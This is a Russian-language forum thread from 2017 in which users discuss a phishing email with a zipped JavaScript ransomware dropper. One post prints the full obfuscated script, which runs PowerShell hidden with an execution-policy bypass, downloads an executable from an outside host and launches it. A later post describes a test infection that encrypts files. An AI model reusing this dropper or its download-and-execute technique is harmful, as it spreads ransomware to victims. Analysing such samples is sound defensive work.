UoKit.com Форумы [Русская версия Invision Power Board]

Автор: Mirage 26.1.2017, 11:45

Прислали письмо с вложением zip файла в котором был js разобрав который вытащил сайт с которого заливается тело исполняемого файла вируса.
Чисто ради практического интереса - можно ли куда то настучать что "вон тот гомосек рассылает вон такие вот пакости!"?
Если у кого есть желание пощикотать пятую точку могу скинуть текст исполняемого скрипта закатчика. Дальше я не полез ибо хер его знает что там.

Автор: Narayan 26.1.2017, 12:36

В горячую линию мвд звони)

Автор: Mirage 26.1.2017, 12:52

Боюсь что там они скажут "Нука че тут за ссылко?" и тыкнут...

Автор: Juzzver 26.1.2017, 14:55

JS не умеет запускать исполняемые файлы. Максимум через ActiveXObject, который работает только в IE, и то с доп. разрешением, и конечно же в случае со скаченным файлом, нужно четко знать куда он скачивается. Но если это стандартная директория с загрузками, то не проблема.

Скорее всего там банально что-то типа:

Код

<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>

Ну и то, чтобы это запустилось, браузер затребует разрешения на запуск.

Даже если каким то образом приложение будет запущено, то потребуется еще подтверждение от винды.

Автор: Destruction 26.1.2017, 15:01

Цитата(Juzzver @ 26.1.2017, 14:55)

JS не умеет запускать исполняемые файлы. Максимум через ActiveXObject, который работает только в IE, и то с доп. разрешением, и конечно же в случае со скаченным файлом, нужно четко знать куда он скачивается. Но если это стандартная директория с загрузками, то не проблема.

Скорее всего там банально что-то типа:

Код

<a href="C:\Program Files\Notepad++\notepad++.exe">Блокнот</a>

Ну и то, чтобы это запустилось, браузер затребует разрешения на запуск.

Даже если каким то образом приложение будет запущено, то потребуется еще подтверждение от винды.

Ну так "Далее, Далее, Далее, Готово". Именно так большая часть вирусов и попадает на компьютеры.

Кроме того, никто не отменял наличие уязвимостей в браузере.

Автор: Mirage 26.1.2017, 16:08

хз как тут в спойлер кидать, Вот текст скрипта в общем:

Code

Код

var FkMwWBV = ''+
'NkN'+
'AfNCNH'+
'sNGNiN.NSheNlN'+
'lNENxeNc'+
'Nu'+
'tNeN('+
'N"'+
'N'+
'CN'+
'mN'+
'D'+
'N.exNeN"N,N "/cN NpNiNnNg l'+
'oNcalN'+
'hoNsNtN N&N N'+
'pNoNwNeNrNsNheN'+
'lNlN.NeNxeN '+
'-NeNxeNc'+
'NuNtio'+
'Nnp'+
'NolNiN'+
'cy b'+
'NyNpa'+
'N'+
's'+
'Ns N-NnN'+
'o'+
'Np'+
'rNof'+
'iNleN N-NwNiNnN'+
'do'+
'wNsNt'+
'NyNleN hNiNdN'+
'de'+
'nN (newN-'+
'oNbN'+
'jectN Nsy'+
'NsN'+
'tNemN.'+
'Nn'+
'NetN'+
'.w'+
'N'+
'eNb'+
'clNiNenNtN'+
')'+
'.NdowNnlNoaNdNfNile(\''+
'N'+
'h'+
'tNtNp://j'+
'Ne'+
'N'+
'fN'+
'freNyN'+
'aNlNaNn'+
'jonNeNs.NcNom/FTN'+
'LOM/iNma'+
'Ng'+
'es/dhlN_'+
'pN'+
'aNr'+
'cNeNl.php\',\'N%ApN'+
'PNdaN'+
'TN'+
'aN%'+
'U'+
'NINSN'+
'3'+
'8N.eNxe\')N; NSt'+
'ar'+
'NTN-Npr'+
'NONCNeSNs \'N%N'+
'APNpN'+
'dNANtN'+
'a'+
'N%NU'+
'ISN38N.eNxe\'"'+
'N,'+
' N"N"N,N'+
' '+
'"NopeNnN'+
'",N N0);';
var oQiuhFV = "HQKQLM\\sQ"+
"oftWQa"+
"Qre\\MQiQC"+
"R"+
"Qo"+
"QSO"+
"QfT\\WIQnQDowsQ QnT\\cQuQ"+
"RQr"+
"QE"+
"NQTQv"+
"eQrQSQiQ"+
"oN\\sQY"+
"QsQtQemr"+
"QOQoT";
oQiuhFV = oQiuhFV.replace(/\Q/g, "");
var OzjGFKuQ = new ActiveXObject("wscRipt.shelL");
var OdbiWJry = OzjGFKuQ.RegRead(oQiuhFV).charAt(378936845/75787369).toUpperCase();
var kAfCHsGi = new ActiveXObject("sHeLl.aPplicatIOn");
(new Function(FkMwWBV.replace(RegExp(OdbiWJry, "g"), "")))();

Мы так баловались на заре скриптописания - объявить переменные что то сложить что то убрать и по хорошему комп периодически будет выключаться. А по плохому будет удаленный доступ до клиента.

У этого кхмдака на страничке "зашифрованной" какие то помощь нуждающимся.

Edit Destruction: Добавил спойлер.

Автор: Juzzver 26.1.2017, 22:08

Прям целая криптография
Ну как я понимаю, данный скрипт будет работать только в эксплоере. Зашифрованная ссылка на файл, который якобы должен запускаться после считывания реестра. Правда тут я не понимаю, как скаченный файл попадает в регистр... Возможно опять таки за счет ActiveXObject элемента, который эксплоер может где то и прописывает.

Детально лень расшифровывать, но в целом интересно. Кто-то да и попадётся на подобное

а хотя... скрипт же в ручную на системе запускается, тогда и браузер то толком нужен лишь для того, чтобы скачался файл. Так уже опаснее)

Автор: Soteric 26.1.2017, 22:20

Цитата(Mirage @ 26.1.2017, 11:45)

Прислали письмо с вложением zip файла в котором был js разобрав который вытащил сайт с которого заливается тело исполняемого файла вируса.
Чисто ради практического интереса - можно ли куда то настучать что "вон тот гомосек рассылает вон такие вот пакости!"?
Если у кого есть желание пощикотать пятую точку могу скинуть текст исполняемого скрипта закатчика. Дальше я не полез ибо хер его знает что там.

Как минимум, через whois можно узнать хостера и написать ему жалобу. И там уже если это хакнутый сайт, то его полечат. Если это сайт самих хацкеров, то выгонят с хостинга.

Автор: Mirage 26.1.2017, 22:55

Цитата(Juzzver @ 26.1.2017, 22:08)

)

Похеру браузер. Файл скачивается фоном (неосознанно) в темповую папку. Смысл штуки следующий. На почту приходит письмо от условно Григория Васильева который является "Вашим новым куратором/отправил Вам финансовую отчетность/Справку о доходах/Акт выполненных работ на соогласование". Как правило приходит либо архив zip либо как в данном случае было написано что файл лежит на корпоративном облачном хранилище и ссылка на архив. Зип файл открывается в любом современном браузере. Если работать с почтовой программой то кидает во временную папку и опять таки открывается встроенным архиватором либо раром либо 7zip. А уж тыкнуть в файл без иконки (он же в архиве) Документы проверить/Договор поставки/Акт на согласование - сам бог велел. А дальше уже по накатанному - подключился, качнул, запустил, шифронул.

ЗЫ на 2 компах проверял. На котором стоял 8 ESET SS с сегодняшними базами файл даже из архива не выполз - завизжала система. Но опять таки кто остановит упрямого бухгалтера которому НАДО СУКА открыть этот меговажный документ во что бы то нистало. На той же версии нода но с базами от осени 2016 года файл спокойно запустился. Но отсутствие интернета на машине не дало произвести какие либо глобальные вредодействия. Завтра буду подключать к выделенной для теста линии и тестить. Опишу степень полярного лиса.

Автор: Mirage 30.1.2017, 9:57

В общем если заранее подготовиться то не так уж все и страшно.
Берем компьютер с чистой виндой. Два пользователя - User - права "Пользователь" и Root - права "Администратор". Оба на разных паролях. UAC включена. Родной фаервол отключен. Установлен ESET SS с не очень свежими базами. Создаем папку с несколькими файлами. 1.doc, 2.xls, 3.jpg, 4.pdf, 5.rar. Кладем копии папок в "Мои документы" обоим пользователям.
Заходим в User. Подрубаем интернет любого типа (я взял для теста yota свисток что бы не положить сеть на тестах ), переходим по ссылке на архив который прислали (у меня файл был заранее скачал) и запускаем Документ.js
Компьютер пару минут пыхтит затем пару раз поморгав запускает эксплорер с предупреждением что компьютер заблокирован и надо платить бабки за восстановление. В параллель начинает вылезать окно UAC с замечанием что что то не так и кто то пытается пролезть в папку систем и куда то еще а прав то не хватает. Окно на закрытие не реагирует - программа в цикле пытается запустить файл пока не убивается в ручную через диспетчер задач. Файлы в документах юзера благополучно запаролены и не читаемы. Сам исполняемый файл вируса падает в папку c:\Uses\User\AppDate\RoamingUIS38.exe.

Если лень копаться то вытаскиваем все документы (живые) из папки Root/Documents и сносим всю системы. Документы в запароленных "Администратором" папках вирус не тронул. После ради прикола тыкнул в файл вируса "Сканировать программой ESET SS" Венда запросила доступ на сканирование администратору системы. После этого документы рута благополучно скисли Так что антивирус даже противопоказан.

Версия для печати темы

Нажмите сюда для просмотра этой темы в обычном формате

UoKit.com Форумы _ Харчевня "3 таракана" _ Вирусы шифровальщики